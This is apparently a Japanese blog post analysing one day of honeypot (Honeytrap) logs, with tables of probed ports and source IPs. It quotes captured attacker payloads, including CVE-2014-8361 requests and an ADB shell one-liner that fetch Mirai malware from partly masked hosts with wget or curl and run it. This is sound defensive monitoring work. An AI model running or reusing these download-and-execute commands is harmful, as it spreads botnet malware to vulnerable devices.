ハニーポット分析(8/12:5日目)
Splunkにログをうまく取り込めず、泣きそうになりましたが、8/12の分析を書いていこうと思います。
今回も、ログの取り込み作業に時間がかかってしまったため、Honeytrapのみとなります。
Honeytrap分析
▪8/12 総検知数 5746 (内、データサイズ 0byte 以上 2549 件)
<宛先ポート別 TOP10>
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,233 | 48.75% | 調査行為 |
3389 | RDP | 148 | 5.85% | 調査行為 |
52869 | D-Link, Realtek SDK | 93 | 3.68% | マルウェアダウンロード (CVE-2014-8361) |
2455 | wago-io-system | 64 | 2.53% | 調査行為 |
1433 | Microsoft SQL Server | 60 | 2.37% | 調査行為 |
8545 | JSON RPC | 44 | 1.74% | JSON RPC へアクセスできるかの調査行為 |
22 | SSH | 40 | 1.58% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 37 | 1.46% | /conf へアクセスできるかの調査行為 |
81 | ? | 36 | 1.42% | HTTPでアクセスできるかの調査行為 |
5555 | Android Debug Bridge (ADB) | 35 | 1.38% |
マルウェアダウンロード |
<宛先ポートごとのペイロード(抜粋)>
445ポート:
PC NETWORK PROGRAM 1.0LANMAN1.0Windows for Workgroups 3.1aLM1.2X002LANMAN2.1NT LM 0.12
3389ポート:
Cookie: mstshash=hello
52869 ポート:
CVE-2014-8361 の脆弱性を狙ったもの(Mirai関連のマルウェアをダウンロード)
・POST /picsdesc.xml
wget http[:]//212[.]237[.]32[.]xx/mips -O am
・POST /wanipcn.xml
wget http[:]//212[.]237[.]32[.]xx -O am
2455ポート:
SMBr@@PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12
8545 ポート:
POST / HTTP/1.1
User-Agent: python-requests/2.13.0
Content-Type: application/json
{"params": [], "jsonrpc": "2.0", "method": "web3_clientVersion", "id": 67}
→JSON RPC が動作しているかの調査行為と思われます。
5555ポート:
shell:cd /data/local/tmp;wget http[:]//207[.]148[.]78[.]xxx/br -O- >br;sh br;busybox wget http[:]//207[.]148[.]78[.]xxx/r -O- >r;sh r;curl http[:]//207[.]148[.]78[.]xxx/c >c;sh c;busybox curl http[:]//207[.]148[.]78[.]xxx/bc >bc;sh bc;rm -rf bc br r c;"
→Mirai関連のマルウェアをダウンロード
<送信元IP別TOP10>
送信元IP | 国 | 検知数 | 割合 | 攻撃ポート |
222.108.143.xxx | Korea | 106 | 4.19% | 複数ポート |
80.211.67.xxx | Italy | 68 | 2.69% | 52869 |
45.33.92.xx | United States | 64 | 2.53% | 2455,9151 |
46.166.148.xxx | Netherlands | 42 | 1.66% | 8545 |
185.156.177.xx | Russian | 39 | 1.54% | 複数ポート |
185.143.223.xxx | Netherlands | 39 | 1.54% | 複数ポート |
103.79.142.x | Viet Nam | 37 | 1.46% | 複数ポート |
222.186.59.xxx | China | 37 | 1.46% | 複数ポート |
139.162.245.xx | United Kingdom | 33 | 1.31% | 23 |
198.74.62.xxx | United States | 32 | 1.27% | 143 |
昨日と比較して、JSON RPCの調査行為が増えたものの、傾向は前日とあまり変わっていませんでした。
明確に攻撃であると分かるものは、Mirai系のマルウェアのダウンロードであり、検知数の上位のほとんどが調査行為と思われる通信でした。
検知数上位は傾向が変わらないため、次回は検知数の少ないもの を調査しようと思います。
今回は簡易ですが、以上が 分析結果となります。